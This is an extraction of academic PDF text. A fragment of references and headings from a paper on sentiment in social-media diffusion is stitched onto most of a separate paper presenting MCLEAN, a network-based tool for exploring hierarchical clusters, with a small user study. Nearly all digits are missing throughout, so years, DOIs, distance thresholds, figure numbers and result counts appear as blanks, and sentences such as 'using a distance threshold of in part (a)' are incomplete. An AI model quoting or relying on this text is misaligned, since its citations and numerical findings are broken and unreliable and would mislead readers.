http://dx.doi.org/ . /j.bushor. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. le l, ferrara e, flammini a. . on predictability of rare events leveraging social media: a machine learning perspective. in: cosn’ : acm sgb conference on online social networks. acm. lehmann j, gonçalves b, ramasco jj, cattuto c. . dynamical classes of collective attention in twitter. in: proceedings of the st international conference on world wide web. acm, – . lerman k, ghosh r. . information contagion: an empirical study of the spread of news on digg and twitter social networks. in: international aaai conference on weblogs and social media, vol. , – . mei q, ling x, wondra m, su h, zhai c. . topic sentiment mixture: modeling facets and opinions in weblogs. in: proceedings of the th international conference on world wide web. acm, – . mestyán m, yasseri t, kertész j. . early prediction of movie box office success based on wikipedia activity big data. plos one ( ):e doi . /journal.pone. . metaxas pt, mustafaraj e. . social media and the elections. science ( ): – doi . /science. . myers sa, zhu c, leskovec j. . information diffusion and external influence in networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. acm, – . nagarajan m, purohit h, sheth ap. . a qualitative examination of topical tweet and retweet practices. in: international aaai conference on weblogs and social media, – . paltoglou g, thelwall m. . a study of information retrieval weighting schemes for sentiment analysis. in: proceedings of the th annual meeting of the association for computational linguistics. acl, – . pang b, lee l. . opinion mining and sentiment analysis. foundations and trends in information retrieval ( – ): – doi . / . ratkiewicz j, conover m, meiss m, gonçalves b, flammini a, menczer f. . detecting and tracking political abuse in social media. in: th international aaai conference on weblogs and social media, – . recuero r, araujo r, zago g. . how does social capital affect retweets? in: international aaai conference on weblogs and social media. sakaki t, okazaki m, matsuo y. . earthquake shakes twitter users: real-time event detection by social sensors. in: th international conference on world wide web, – . stieglitz s, dang-xuan l. . emotions and information diffusion in social media—sentiment of microblogs and sharing behavior. journal of management information systems ( ): – doi . /mis - . suh b, hong l, pirolli p, chi eh. . want to be retweeted? large scale analytics on factors impacting retweet in twitter network. in: ieee nd international conference on social computing. ieee, – . tang j, lou t, kleinberg j. . inferring social ties across heterogenous networks. in: proceedings of the fifth acm international conference on web search and data mining, – . thelwall m, buckley k, paltoglou g. . sentiment in twitter events. journal of the american society for information science and technology ( ): – doi . /asi. . thelwall m, buckley k, paltoglou g, cai d, kappas a. . sentiment strength detection in short informal text. journal of the american society for information science and technology ( ): – doi . /asi. . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /science. http://dx.doi.org/ . / http://dx.doi.org/ . /mis - http://dx.doi.org/ . /asi. http://dx.doi.org/ . /asi. http://dx.doi.org/ . /peerj-cs. ugander j, backstrom l, marlow c, kleinberg j. . structural diversity in social contagion. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . varol o, ferrara e, ogan cl, menczer f, flammini a. . evolution of online user behavior during a social upheaval. in: acm conference on web science. acm, – . vespignani a. . predicting the behavior of techno-social systems. science ( ): – doi . /science. . weng l, menczer f, ahn y-y. . virality prediction and community structure in social networks. scientific reports . weng l, menczer f, ahn y-y. . predicting successful memes using network and community structure. in: th international aaai conference on weblogs and social media. article . ferrara and yang ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. quantifying the effect of sentiment on information diffusion in social media introduction materials and methods sentiment analysis data results the role of sentiment on information diffusion conversations' dynamics and sentiment evolution discussion acknowledgements references submitted december accepted january published january corresponding author daniel alcaide, daniel.alcaide@kuleuven.be, daniel.alcaide@esat.kuleuven.be academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright alcaide and aerts distributed under creative commons cc-by . open access mclean: multilevel clustering exploration as network daniel alcaide and jan aerts department of electrical engineering (esat) stadius center for dynamical systems, signal processing and data analytics, ku leuven, leuven, belgium imec, ku leuven, leuven, belgium abstract finding useful patterns in datasets has attracted considerable interest in the field of visual analytics. one of the most common tasks is the identification and representation of clusters. however, this is non-trivial in heterogeneous datasets since the data needs to be analyzed from different perspectives. indeed, highly variable patterns may mask underlying trends in the dataset. dendrograms are graphical representations resulting from agglomerative hierarchical clustering and provide a framework for viewing the clustering at different levels of detail. however, dendrograms become cluttered when the dataset gets large, and the single cut of the dendrogram to demarcate different clusters can be insufficient in heterogeneous datasets. in this work, we propose a visual analytics methodology called mclean that offers a general approach for guiding the user through the exploration and detection of clusters. powered by a graph- based transformation of the relational data, it supports a scalable environment for representation of heterogeneous datasets by changing the spatialization. we thereby combine multilevel representations of the clustered dataset with community finding algorithms. our approach entails displaying the results of the heuristics to users, providing a setting from which to start the exploration and data analysis. to evaluate our proposed approach, we conduct a qualitative user study, where participants are asked to explore a heterogeneous dataset, comparing the results obtained by mclean with the dendrogram. these qualitative results reveal that mclean is an effective way of aiding users in the detection of clusters in heterogeneous datasets. the proposed methodology is implemented in an r package available at https://bitbucket.org/vda-lab/mclean. subjects data science, visual analytics keywords exploratory data analysis, graph and network visualization, hierarchical clustering, visual analytics introduction determining the number of clusters in a dataset is a frequent problem in data clustering, and is a distinct matter from the algorithm of actually solving the clustering problem. the correct choice of the number of groups is often ambiguous depending on the shape and scale of the points in a dataset and the desired clustering resolution by the user. the optimal choice of clusters depends on the intended use, but in general, it strikes a balance between the maximum compression using a single cluster and the highest resolution of the data by assigning each data point to its own cluster. how to cite this article alcaide and aerts ( ), mclean: multilevel clustering exploration as network. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:daniel.alcaide@kuleuven.be mailto:daniel.alcaide@esat.kuleuven.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://bitbucket.org/vda-lab/mclean http://dx.doi.org/ . /peerj-cs. several clustering algorithms have been proposed for partitioning datasets (jain, murty & flynn, ). most of these rely on parameter settings, such as the number of clusters in k-means, the reference value (ε) in dbscan or the cutoff distance in a hierarchical clustering. these parameters differ from the algorithm, but either directly or indirectly specify the number of clusters. setting these parameters demands either detailed pre- existing knowledge of the data or time-consuming trial and error. moreover, a singular cutoff can hide interesting underlying structures. in the real world, there might not be an single sensible cutoff, and it is common that automatic clustering methodologies ignore particular characteristics of clusters, as some of these might be for example particularly dense or sparse. as boudjeloud-assala et al. ( ) state, ‘‘the clustering process is not complete until it is evaluated, validated, and accepted by the user. as such, visual validation and exploration can improve understanding of clustering structure, and can be very effective in revealing trends, highlighting outliers, and showing clusters’’. visualizing clustering results can help to quickly assimilate the information and provide insights that support and complement textual outputs or statistical summaries. typical questions to be answered regarding clustering results include how well defined the clusters are, how far away they are from each other, what their size is, and if the observations belong strongly to the cluster or only marginally. therefore the exploration of the different cluster scenarios and the identification of similar record groups (i.e., patterns) in the dataset is a challenge for the user (vogogias et al., ). hierarchical clustering is a widely used and effective algorithm to answer these questions, as it provides a framework for viewing the clustering at different levels of detail by imposing a hierarchy on it using a tree (friedman, hastie & tibshirani, ). during the cutoff selection process of the tree, the analyst can instantly obtain insights from the graphical representation that suggest the adequacy of the solution but hierarchical clustering does have some drawbacks: ( ) the dendrogram representation becomes cluttered when datasets get large; ( ) a single cut of the dendrogram is sufficient when the dataset is homogeneous. however, when the dataset is heterogeneous, multiple cuts at different levels might be required. ( ) if patterns are present at different levels, choosing a cutoff will hide all but one of these. clustering methods often are a fixed process: loading a dataset, setting parameters, running the algorithm, and plotting the results. in other words: clustering is used generally to analyze the data, not to explore it (boudjeloud-assala et al., ). the integration of visualization and algorithm into the same model is a possible solution to make the clustering process dynamic. the framework to perform interactive visual clustering (ivc) presented by boudjeloud-assala et al. ( ) demonstrated a significant advantage in data mining since it allows users to participate in the clustering process by leveraging their visual perception and domain knowledge. as recommended by keim, mansmann & thomas ( ), we believe that if we adapt the visualization environment and combine it with the clustering approach, this combined approach can be used to provide a very natural way for users to explore datasets. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we suggest a novel and generic clustering and exploration approach called mclean (multilevel clustering exploration as network) for grouping and visualizing multiple granularities of the data that enables: ( ) exploration of the dataset using a overview- plus-detail representation, ( ) simplification of the dataset using aggregation based on the similarity of data elements, ( ) detection of substructures by means of community detection algorithms, and ( ) inclusion of the human in the process of selection the number of clusters. our methodology follows a synergistic approach that combines the strengths of connectivity-based algorithms, community detections techniques and the ability of humans to visually detect patterns, to explore moderately large datasets. it is a visual exploratory and clustering method that permits the user to interact with the algorithm results. the method combines hierarchical clustering algorithms with interactive tools to find optimal clusters and visualize them in a simplified network representation. network visualizations are an effective means to understand the patterns of interaction between entities, to discover entities with interesting roles, and to identify inherent groups or clusters of entities (liu, navathe & stasko, ). the mclean methodology is implemented in an r package available at https://bitbucket.org/vda-lab/mclean. the remaining part of this paper is organized as follows. in the section ‘background’ we give an overview of related work in multilevel clustering and graph visualization techniques as an exploratory tool. the section ‘methods’ describes the proposed visualization technique for clustering exploration in detail, followed by the section ‘evaluation’, in which we present an evaluation of our approach. finally, the section ‘conclusions and future work’ presents conclusions and possible directions for future work. background the proposed framework allows the user to employ tacit knowledge in the clustering process in order to detect substructures. this process provides a multilevel environment through overview-plus-detail offering both a general outlook of the data grouping and the precise union of a subset of elements using graphs. to set our work in context, we present a set of examples of visual multilevel clustering and the network transformation of data to identify patterns. visual multilevel clustering there are several methods to perform clustering analysis, but only a few of them support visual analysis. even fewer provide interactive exploration capabilities of the clusters in different levels of detail. however, the importance of visual interaction for performing clustering analysis is increasingly recognized (nielsen et al., ), as the expert users are capable of steering the analysis to produce more meaningful results. the tacit knowledge often motivates the decisions of the users that algorithms are not able to process or incorporate by themselves. therefore, including a human in the loop for taking decisions and for guiding the analysis is essential (vogogias et al., ). hierarchical clustering has been long used in many different fields including biology, social sciences, and computer vision due to the ease of interpreting the output by the user. the selection of the clusters is based on a single similarity threshold, where the tree is cut at alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/vda-lab/mclean http://dx.doi.org/ . /peerj-cs. a uniform height. unfortunately, large and heterogeneous datasets usually require a more flexible approach allowing the user to explore different clustering scenarios. some methods have been proposed to cut the tree at different levels. langfelder, zhang & horvath ( ) suggested an automatic approach that cuts the branches of the dendrogram in different levels based on their shape. obulkasim, meijer & van de wiel ( ) proposed a procedure to detect clusters from the dendrogram, called guided piecewise snipping. the method overcomes the drawbacks of the fixed height cut approach by allowing the piecewise rather than the fixed-height cut and incorporating external data to decide upon the optimal cut. in the same line of research, mlcut (vogogias et al., ) is a tool that provides visual support for exploring dendrograms of heterogeneous data sets at different levels of detail. partition-based clustering techniques such as k-means and clarans (ng & han, ) attempt to break a data set into k clusters optimizing a given criterion. boudjeloud- assala et al. ( ) presented a semi-interactive system for visual data exploration of multidimensional datasets using iterative clustering. their framework connects the user and the data mining process, which allows the user to play an active role in the clustering tasks. looney’s approach (looney, ) implements a process of removing small clusters in an iterative way, reassigning them into more dense regions. in doing this, consistency in the clustering results is improved. similary, bruneau & otjacques ( ) proposed an approach to integrate user preferences into the clustering algorithm in an interactively way through d projection of the dataset. rinzivillo et al. ( ) proposed an exploratory methodology for exploring a large number of trajectories using clustering techniques. the grouping of the trajectories is progressively applied by the users refining the parameters of the clustering algorithm. graph representation the dendrogram visual representation is not scalable to larger datasets. a technique presented by chen, maceachren & peuquet ( ) uses a uniform threshold to provide improved visibility by simplifying the dendrogram representation. this is a useful technique for summarising the dendrogram in a selected level of detail and making it fit in smaller displays. however, it does not provide support for multilevel cuts or data exploration at multiple levels. given a matrix whose entries represent the similarity between data items, many methods can be used to find a graph representation. in fact, modeling data items as a graph is a common conceptualization used in hierarchical clustering algorithms. in a more general approach, ploceus (liu, navathe & stasko, ) offers an approach for performing multidimensional and multilevel network-based visual analysis on tabular data. users can flexibly create and transform networks from data tables through a direct manipulation interface. ploceus integrates dynamic network manipulation with visual exploration for a seamless analytic experience. the whatsonweb system (di giacomo et al., ) takes advantage of graph-based visualization created by the results of a web search engine. in their system, a search query produces a graph that represents sets of web pages as nodes, which are connected if documents are sufficiently semantically related. the strength of the relationship is encoded alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. with an edge weight and a topological clustering algorithm is recursively applied to the graph, forming a graph hierarchy and showing different levels of information. systems presented for clustering and exploration in duman, healing & ghanea-hercock ( ), desjardins, macglashan & ferraioli ( ), beale ( ) and lee et al. ( ) transform the data into a spring-embedded graph layout, encoding the distance between the elements as forces in the force-directed layout. the objective in these systems is the projection of the distances in a reduced dimension allowing clustering assignment using partitioning-based methods. links are usually omitted in the representation facilitating the readability of the spatialization of the nodes. they present an alternative to standard dimension reduction methods such as projection pursuit or multi-dimensional scaling. the network exploration of mclean can be considered close to the solutions proposed for the navigation of the clustering results for large-scale graph visualization systems, such as eades & feng ( ) and eades & huang ( ). they allow the user to navigate a graph by iteratively expanding or collapsing the aggregated nodes (meta-nodes). however, users often lose context when navigating clustered graphs with deeper hierarchies (abello, van ham & krishnan, ). methods the mclean method takes a similarity matrix of all data records as input, and produces a simplified graph representation showing a higher abstraction of the clustering process. mclean combines two visual representations. first, an overview plot (barcode-tree), related to a dendrogram and topological barcode plot, shows how the general cluster structure changes for different values of a parameter ε, indicating how close points need to be in the multi-dimensional space to be considered belonging to the same cluster. second, a node-link plot represents the clustering results at a given ε. for this ε, clustering information in the node-link diagram is dual-layered. first, graph connected components correspond to data clusters at this threshold ε. second, different colours within a connected component indicate that this subnetwork would be split when using a more stringent ε; in other words, it indicates substructures in this cluster. a connected component is a subgraph in which all the vertices are directly or indirectly connected. we use connected components to define the clusters in the dataset. in addition, mclean employs community detection algorithm to find subclusters inside connected components. as a result, user knowledge (tacit or other) can inform on whether a cluster is distinct or is a part of a larger cluster. this ambiguity is common in heterogeneous data sets. as most of the clustering techniques, the agglomerative algorithm that we use depends on one single parameter. this parameter is a threshold (�) that defines the distance of union between two data elements. we find similarities between the mclean approach and topological data analysis (tda). analyzing the multidimensional spaces from a topological structure perspective, interpreting the persistent homology by calculating the number of connected components (b from betti numbers) and using the persistence concept to define the optimal threshold of network representation prove that although the aims are distinct they share a same philosophy of analysis (topaz, ziegelmeier & halverson, ). alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure workflow diagram of mclean algorithm, consisting of four steps: ( ) graph transforma- tion, ( ) node aggregation, ( ) community detection and, ( ) barcode-tree creation. full-size doi: . /peerjcs. /fig- the mclean method consists of four parts as illustrated in fig. : ( ) transformation of the distance matrix into a node-link representation based on the threshold defined; ( ) simplification of the network creating aggregated nodes; ( ) detection of substructures employing community detection algorithms; and ( ) exploration of the resulting networks for different threshold values. the methodology in this section is illustrated using a dataset taken from the uci repository website (see fig. ). this dataset contains examples of control charts synthetically generated as described by alcock & manolopoulos ( ). we used dynamic time warping (dtw) for measuring similarity between the temporal sequences. figure illustrates both representations of the raw data (figs. a and b) and classical visualizations of the distance matrix such as the dendrogram (fig. c) and a scatterplot of the two first dimensions of multidimensional scaling (fig. d). alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure representation of a synthetic dataset that contains examples of control charts syntheti- cally generated by the process in alcock & manolopoulos ( ). (a) time series are treated as a unique group. (b) underlying (hidden) time series are split by their label. (c) dendrogram using single linkage. (d) two first dimensions of classical multidimensional scaling. color represents the label in the dataset. full-size doi: . /peerjcs. /fig- graph transformation multidimensional scaling (mds) projects the data elements in reduced dimension ordina- tion space. two or three dimensions are often used, which is based on ease of visualization rather than on the dimensionality of substructures in the data. unfortunately, in some cases, these projections blur patterns due to the heterogeneity of the distances and the limitations of the space visualized. therefore, a change to the spatialization (such as network visualization) can help to overcome the limitations of complex datasets. an example of these weaknesses can be seen in the mds applied to the synthetic dataset in fig. d. although the distance matrix does not contain explicit network semantics, mclean uses this approach to transform the encoding of distances by the use of links in the network. moreover, the algorithm employed in the final drawing of the network (i.e., force-directed graph) is optimized to avoid overlapping between the nodes. the graph transformation step of mclean is similar to the dbscan method (ester et al., ), in that it relies on a parameter � which defines the radius that designates points to be lying in each other’s neighbourhood. in dbscan, a second parameter numpts is used to define the minimal number of points that can constitute a cluster. in mclean, however, all datapoints are considered network nodes, and datapoints that are within a distance � from each other are linked. the result of this step produces a graph where there exists a path between two nodes if and only if they belong to the same connected component. at this stage of the methodology clusters are represented as connected components in topological space. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure node-link network transformation using force-directed layout from the distance matrix us- ing a distance threshold of in part (a), in part (b), in part (c) and, in part (d). all data elements are represented as a node in the network. edges are defined based on the threshold. full-size doi: . /peerjcs. /fig- figure network representation of the clustered dataset using a parameter ε of in part (a), in part (b), in part (c) and, in part (d). this representation preserves the same structure shown in fig. . full-size doi: . /peerjcs. /fig- figure shows the graph transformation process for four snapshots of different parameters � applied to the same dataset. as � increases, the number of links grows between the nodes. node aggregation in case of large datasets, the node-link representation can become visually overwhelming for the user without a proper level of aggregation. the challenge is to extract understandable information buried in the structure of multiple nodes and links. in addition, a layout of the entire graph is costly to compute. mclean simplifies and highlights the structure of the raw network. this process of simplification is founded on the use of aggregating nodes (meta-nodes) that represent a subgraph at a higher level of abstraction. node aggregation is based on degree centrality, where the degree of a node is defined as the number of connections that the node has within a network. this value is computed for all nodes, and the highest one is the first candidate to be the center of an aggregated node (meta-node). all nodes connected directly with the candidate are converted into an aggregated node. all connections with other data elements are inherited in the meta-node keeping the structure of the connected component. the result of node aggregation for the graphs created in fig. is shown in fig. . alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure illustration of node aggregation process for a set of fifteen elements. (a) network without aggregation. node in the network is the best candidate to build the first meta-node. all nodes directly connected to this node become part of the meta-node. (b) network after the creation of the first meta- node. the aggregation continues until all nodes are aggregated. the best candidates are node and node at this step. (c) network at last stage of the aggregation process. node and become individual meta- nodes. (d) resulting aggregated network. full-size doi: . /peerjcs. /fig- our simplification graph approach was designed to preserve the structure of the input graph. according to archambault, munzner & auber ( ), a topologically preserving graph must respect the following two properties: . edge conservation: an edge exists between two meta-nodes m and m if and only if there exists an edge between two leaves in the input graph l and l such that l is a descendant of m and l is a descendant of m . . connectivity conservation: any subgraph contained inside a meta-node must be connected. by respecting these two properties, we ensure that the resulting graph preserves the topological features of the initial graph: edge conservation guarantees that any edge in the simplified graph is present in the initial graph, while connectivity conservation ensures that any path can continue through any meta-node (archambault, munzner & auber, ). in mclean, meta-nodes are created through the densest nodes (highest degree) in a connected component. the node with the highest degree is the best candidate to be the center of the meta-node. figure a shows an illustration of a connected component where node eight is the best candidate. all nodes connected directly to the best candidate become part of the meta-node as shown in fig. b. a meta-node inherits the edges with the external nodes or meta-nodes that do not belong to it. the aggregation is an iterative process until all nodes become part of a meta-node. aggregated nodes are excluded from the process preventing them to be included into another meta-node. for example node ten is part of the meta-node of node eight. therefore, it cannot be included in or be a candidate for a new meta-node although it has the same degree as four and fourteen in fig. b. the number of connected components or clusters does not change after the simplification process. figure b show the result of the node aggregation process. community detection the simplified network representation (fig. ) preserves structural data in a compressed way, which together with community detection allows revealing substructures inside connected components. a community refers to a group of nodes that are internally alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure network representation of the clustered dataset using the distance threshold of in part (a), in part (b), in part (c) and in part (d). communities are detected through infomap. the coloring of nodes illustrates the communities detected by the algorithm. full-size doi: . /peerjcs. /fig- highly connected. community detection in networks is not a trivial problem, and many algorithms have been proposed. mclean relies on the infomap algorithm (information- theoretic method) (rosvall & bergstrom, ), which provides multilevel solutions for analyzing undirected, directed, unweighted, and weighted networks. in mclean, the number of data elements in each simplified node is used as vertex weight in the infomap algorithm to reduce the effect of aggregation. different communities in a single connected component are shown in different colors. figure shows the networks created after graph transformation (fig. ) and node aggregation (fig. ) applying the results of community detection. prevalence of communities increases with network size, as shown in fig. where part a does not reveal any substructure but part d shows three in a single connected component. barcode-tree as indicated above, the generated connected components depend on the value of parameter �, as can be seen in the four subplots in fig. . in general, the network consists of isolated vertices for small values of the threshold. at the largest value, the entire dataset is a single connected component. the selection of a representative threshold without prior knowledge of the underlying space is however difficult for any dataset. in addition, heterogeneous datasets may need multiple levels of partitions and therefore will require the exploration of multiple thresholds. in order to provide guidance in the parameter choice and a contextual overview of the relation between � and clustering results, mclean generates these graphs across a range of � values. these are subsequently combined in the tree representation called barcode-tree, which is inspired by both a clustering dendrogram and barcode representation (topaz, ziegelmeier & halverson, ) as used in topological data analysis. the barcode-tree (fig. ) is a visual representation of cluster arrangement. the horizontal axis corresponds to threshold � and refers to the distance measure of union between the data elements that define the network (see ‘graph transformation’ section). the individual components are arranged along the vertical axis of the plot. at any given threshold, the number of connected components is the number of lines that intersect the vertical line through the threshold. meta-nodes are formed in the join points that are alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure barcode-tree for a sequence of thresholds from to by steps of using gradient color to represent the number of communities for each connected component. full-size doi: . /peerjcs. /fig- aggregations of individual data elements or existing meta-nodes at a smaller threshold (see ‘node aggregation’ section). this tree overcomes the limitations of binary structure of a dendrogram, allowing for a more clear representation of branches. moreover, the barcode-tree implements a leaf ordering method motivated by the molo algorithm presented by sakai et al. ( ). the branches are evaluated backwards recursively (from the single cluster until the singleton) to be the center of the subtree at each threshold avoiding the crossing of the branches. meta-nodes for a small threshold are aggregated into new ones created by the larger threshold: if � ≤� ≤� ≤···≤�n− ≤�n then m ⊆m ⊆m ⊆···⊆mn− ⊆mn with mi being the meta-nodes in network i. if the user is interested in understanding the structure of the input data, then topological hierarchies are useful tools to explain the origin of all edges viewed in a cut. both the objective for the barcode-tree view in mclean and the barcode in tda is to find the persistent topological structures across a range of thresholds. those structures which persist over an extensive range are considered signals of the underlying topology. as the threshold changes, the topological structures of network change accordingly. in fig. , we see the representation of the connected component for the range of � from to . for �= , we see connected components because there are no connections amongst the individual elements in the dataset. for �= , we see a big connected component and a significant subset of individual elements, reflecting the fact that some vertices have joined into a larger connected component. for �= , we see a single connected component that indicates the joining of all data elements. the resolution of the plot depends on the number of evaluations, showing a general overview with only a few thresholds (fig. e) or allowing detailed understanding of connected component composition with a more dense covering of thresholds (fig. a). although the exploration of the connected components path around a threshold of interest can give an intuition of the resulting network, the analysis of the connected alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure set of five curves of connected components vs. threshold distance according to different granularities. (a) barcode-tree for the range of ε ( to ) by steps of , (b) by steps of , (c) by steps of , (d) by steps of and (e) by steps of and (f) by steps of . full-size doi: . /peerjcs. /fig- components using the network representation (fig. ) is a necessary step to identify hidden substructures using only the tree representation. for example, at threshold in fig. , we identify a single connected component. however, we identify more details in the structure of the network at fig. d. evaluation to understand the implications of the proposed methodology and the interaction between the visuals, we performed a qualitative evaluation regarding learnability and usability of mclean. we recruited six participants, including four doctoral and two post- doctoral researchers in the area of data science with knowledge of clustering techniques (e.g., hierarchical or k-means clustering) and dimensionality reduction techniques (e.g., multidimensional scaling and pca). none had seen or used mclean before the evaluation test. the goal of the evaluation was to identify qualitative insights about how well mclean supports the identification of patterns according to the simplification of the dataset. tasks and procedures we gave a brief introduction to mclean, explaining the fundamentals of the methodology and demonstrating the main functionalities of the interface developed to interact with the network and barcode-tree including the bidirectional selection of elements between the two visuals (see fig. ). a training exercise was performed to familiarize the participants with the mclean workflow using the fisher iris dataset (fisher & marshall, ). we asked the participants to explore the general patterns in the barcode-tree and specific topological structures utilizing the network representation and community finding results. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure detection of patterns between the barcode-tree and dendrogram. part (a) highlights the four patterns detect by five out of six participants in the barcode-tree. part (b) shows the four patterns detected in the dendrogram. pattern b * was identified as an additional pattern by two out of five participants. full-size doi: . /peerjcs. /fig- we repeated the exercise for the actual evaluation over the control charts dataset, explaining only that it concerned time-series data. we asked the participants to think aloud, observed their interaction with the interface, recorded their patterns selection as hand-written notes, and sought their impressions and comments on the methodology after they completed the tasks. to conclude we asked them to complete a questionnaire to evaluate the efficacy and their satisfaction of mclean compared to dendrogram. we also sought to know how difficult the methodology was to learn and use, if there were any problematic design issues, and how we might be able to address the difficulties experienced by the participants. results and analysis the evaluation exercise was split into three parts: detection of patterns using the barcode- tree, selection of thresholds comparing the dendrogram and barcode-tree, and detection of patterns combining the network representation and barcode-tree. after the exercise, the questionnaire was provided to obtain user satisfaction and additional feedback. detection of patterns using the barcode-tree in a first evaluation, we sought to identify to what extent participants are able to identify the different underlying patterns as shown in fig. b. five participants (participants a–e) identified four different patterns in the temporal dataset using the barcode-tree exclusively for the range of � to by steps of (fig. ). participant f identified two patterns using the same representation, grouping pattern a , a and a as a single pattern and pattern a independently from the rest (see fig. ). identical results were found in the dendrogram exploration. in addition, pattern a was classified as a group of outliers by participants d and e. when identifying four patterns, users a-e aggregated type and type (see fig. b) signals into a single pattern (pattern a ; see fig. a), and type and type in pattern a . in both cases, the pairs behave similarly, but in opposing directions: a continually increasing or decreasing trend, or a shift in the middle of the time series. in each pair, the alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. global distance between the different types is small compared to the rest of patterns due to the sequence alignment using dtw. when using the dendrograms, (fig. b), participants a–e identified between three and five patterns. two or three groups were detected in the middle, and the heterogeneous data elements (pattern b ) were recognized as an additional pattern and misunderstood as two independent clusters by users b and e due to the location of the branches. participant c identified a single cluster containing signals of type , type and type , and another containing type and type . this result shows a slight loss of perception in the dendrogram compared to barcode-tree and a possible potential misinterpretation of the dendrogram due to to the position of the branches. changes in tree resolution did not present a change in the interpretation of participants when resolution was increased, i.e., steps of and (figs. a and b) but it did when the resolution decreased. three participants (b, c and e) detected six patterns when we evaluated the number of connected component in steps of as shown in fig. f. this fact reveals that different resolutions lead to different possible interpretations of the data. selection of cutoffs in dendrogram and barcode-tree using dendrogram exploration, only participant f experienced difficulties in cutoff selection, whereas participants a-e selected a single cutoff between thresholds and , describing two or three notable clusters and ungrouped data-elements. using the barcode-tree, participants a-e selected a similar threshold. participant d investigated an additional threshold at . participant f picked the threshold with the intention of exploring the network representation. the number of cutoffs was not limited in any of the representations allowing the user to explore different partitioning perspectives. overall, users were more confident in choosing thresholds using the barcode-tree than when using the dendrogram. a persistent segment starts at the � threshold of until the join of three clusters at threshold . discussion with the participants indicated that this persistence in the barcode-tree makes for better readibility and therefore higher confidence in threshold selection. in contrast, the binary union of the branches and non-optimisation of the leave ordering in the dendrogram can lead to misinterpretation of the cutoff selection leaving some elements outside of a potential cluster. detection of patterns combining the network representation and barcode-tree in this part, we aimed to evaluate the detection of the structures through community detection and interaction between the visualizations. we identified three relevant thresholds for the network representation at the start of the three most persistent topological structures (see fig. a), more specifically at threshold , , and , and invited the participants to describe the patterns seen using both the network and the tree representations (fig. ). we encouraged them to use the interaction between these visual encoding to clarify their relationship. three participants (c, e and, f) identified six patterns at threshold , while the others recognized four. the number of patterns recognized was three for all participants at thresholds and . both the network representation and the color- encoding to represent the communities detected by infomap were clear for all participants. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure network representations of the synthetic time-series dataset (fig. ) at the beginning of the three most persistent structures detected in the barcode-tree. (a) network at threshold . the grey node corresponds to type signal. the two connected components correspond to signals of type / (blue and red) and type / (orange and green), respectively. in both cases, ascending—respectively descending—signals are combined in a single connected component but still distinguish between gradual or stepwise change based on colour. (b) network at threshold . the most significant connected com- ponent in the network integrates all signals in the dataset, excluding type represented as individual grey elements. two communities represented as different colors distinguish the ascending (blue) and descend- ing (orange) patterns of the network. (c) network at threshold . the single connected component net- work still allows the detection of the ascending and descending patterns and the high variability of signal type (green) due to the community detection algorithm. full-size doi: . /peerjcs. /fig- the difference in number of perceived patterns shows a critical sense of the community detection results, demonstrating the added value of the human in the pattern selection. user satisfaction and comments all the participants indicated that they liked the mclean methodology, especially the obtained interpretation due to the change of the layout in the network creation. although some participants considered the selection of thresholds and interpretation of community detections nontrivial, they still agreed that the methodology was consistent and the learning curve was not too high. participants strongly favored the use of mclean over dendrogram in terms exploration and clustering technique due to the better readability of the tree and the power of combining the two visualizations interactively. this indicates the benefits of this methodology as an interactive visual clustering facilitating the integration and evaluation of the results by the user. conclusion and future work in this paper, we described a method for interactive multi-resolution exploration of clustering results in complex datasets. evaluation experiments indicated that combining visualizations and analytical techniques can increase the understanding of the information for the user by providing more transparency and confidence to the process. although the number of clusters and their quality is strongly related to user behavior, we believe that this is actually a strength of the system (one that was specifically aimed for), and that these approaches used in conjunction are crucial to allowing a user-centric approach to information discovery, to exploit heterogeneous data sources better. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. although the presented network and barcode-tree representations help the user in gaining insight in their data, there are some clear points for future work. for example, the current approach relies on single linkage clustering whereas average and/or complete linkage clustering might be 